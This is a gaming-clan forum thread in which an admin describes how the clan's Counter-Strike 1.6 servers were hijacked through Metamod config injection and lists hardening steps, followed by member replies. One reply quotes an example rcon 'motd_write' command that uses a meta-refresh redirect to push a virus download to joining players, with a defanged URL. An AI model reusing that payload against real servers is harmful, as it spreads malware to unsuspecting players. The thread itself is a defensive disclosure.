Login

Ash · (This post was last modified: 05-07-2013, 02:12 AM by Ash.)

Past weeks, hundred and hundred webs around the world got Defaced by some Arab teams... commanded by a guy named "SiR Abdou" (personally i think "defaced work" is so lame, thats cant be called "HACKED"

anyways.... past days a group of kids has exploited /injected some Cs. 1.6 servers, and i think those kids wanting some attention, are using "SiR" nicks trying everyone think cs servers got hacked by same Arab Team...

i just think that was by Russians...

Ok. i was looking into BsK and AG VDS finding any kinda evidence to trace those intrusions, i found just few evidence, because those kids disable servers logs to protect his identity...

1- Since we cant Update our Dproto servers, we are at risk to being attacked so easy, we have nothing againts this.... BUT WE GONNA DO OUR BEST TO PROTECT ALL OUR TEAM.

2- The only thing i saw, was a kinda Metamod inject / xploit

This what i saw:

create/download a file named Client.jar this file is backdoored (i will decompile this next days) in this root: /gameroot/cstrike

[Image: troyan.png]

then create a exec file in /gameroot/cstrike/addons/metamod

[Image: execa.png]

inside this exec.cfg file:

[Image: exec2.png]

a folder named "maps" is created in /gameroot/cstrike/addons/amxmodx/configs

inside that folder are all those map configs

[Image: maps.png]

inside each map.cfg are all stupid edited cvars, so as everyone knows, that map folders is autimatic readed each server restart, so cvars keep loading after each map change

[Image: configsd.png]

So, now everyone know rcon and nick passwords to enjoy all "hacked servers"

there are few thing that i will do in BsK servers, to protect us..

1- motd.txt will be read-only
2- we gonna disable pause/unpause plugin
3- added those steam, nicks to amxbanlist also servers banlist
4- make read-only "maps" folder
5- make read-only user.ini file to avoid those kids added as admin
6- thinking add some rcon protect plugins (changing name to avoid those kids can disabled
7 "log off" and "mp_logfile 0" always wil be ON

I decide post this, because i think that info can be readed and used by other clans to protect his owns VDS...

if anyone have any idea or suggestion about this, please let us know!

N0616JC · 05-07-2013, 08:59 AM

Out of curiosity, does our servers has any type of anti-virus/malware/trojan software installed on them?

Ash · (This post was last modified: 05-07-2013, 02:40 PM by Ash.)

(05-07-2013, 08:59 AM)N0616JC Wrote: Out of curiosity, does our servers has any type of anti-virus/malware/trojan software installed on them?

AV cant reject this kinda inject, because thats a "rcon" "cvar" in servers to download external troyans between "external link -----> Player PC...

Example: Rcon from 178.123.103.201:15518:rcon 1399145428
XXXXXXXXXXXXXXXXXXX motd_write <META HTTP-EQUIV=Refresh CONTENT="0 URL=http *//downloadingvirustoplayer*com/cstrike*exe"

into a VDS we cant run any kinda AV, because this reduce resources and increase servers lag....

So... Our VDS is not Remotely hacked or anything like that, we got some protection to avoit intrusions, like firewall and port filtering settings...

It's so important everyone report any server issue, to check and be sure we are safe...

Motd (when u join a server appear a image with server stuff and bsoldiers weblink) when u saw no image on MOTD please report us...

when u saw hostname different to [Bsoldiers.com] CLASSIC SERVER FASTDOWNLOAD blah blah, please report.

also when ur admin access didnt works...

(Sorry my english, if somebody can fix it, feel free)

Extra info about those xploits HERE

N0616JC · 05-07-2013, 05:48 PM

I am glad that our community is taking steps to preventing the same thing from happen to us. However, I think that our
Dust2 24/7 server might be at a higher risk than other servers in our community as that the server's host-name was changed to a clan somewhere in Romania, I will pay closer attention to that server when I am entering any BsK owned servers. Also, I think this thread should get more "heat" so that our members would be safer and more aware of the situation. Also, I hope that this is will pass without other incident to our servers. In all, I hope that our prevention will hold.

**VeGa** · 05-07-2013, 09:11 PM

wow but i have only 1 question: as you realize this problem?

Ash · 05-07-2013, 09:21 PM

(05-07-2013, 09:11 PM)VeGa Wrote: wow but i have only 1 question: as you realize this problem?

my mom has told me Blush

**VeGa** · 05-07-2013, 09:32 PM

hahaha and thanks besnik you help us many times Big Grin

**H I G H** · 05-07-2013, 10:59 PM

wooo this is some interesting stuff there.. nicee besnik.. pretty tight stuff Smile

you always come up with all these brilliants ideas bro... keep it up.. 2 thumbs up Big Grin

Ash · 05-07-2013, 11:02 PM

(05-07-2013, 10:59 PM)H I G H Wrote: wooo this is some interesting stuff there.. nicee besnik.. pretty tight stuff you always come up with all these brilliants ideas bro... keep it up.. 2 thumbs up

ty Sr.! btw, long time didnt saw u!! good to know u are back!!!

N0616JC · 05-07-2013, 11:23 PM

(05-07-2013, 11:02 PM)besnik_91 Wrote:
(05-07-2013, 10:59 PM)H I G H Wrote: wooo this is some interesting stuff there.. nicee besnik.. pretty tight stuff you always come up with all these brilliants ideas bro... keep it up.. 2 thumbs up

ty Sr.! btw, long time didnt saw u!! good to know u are back!!!

LOL, where have you been besnik, he has been back for a while now.

Go Social

Navigation

Extra Menu

About us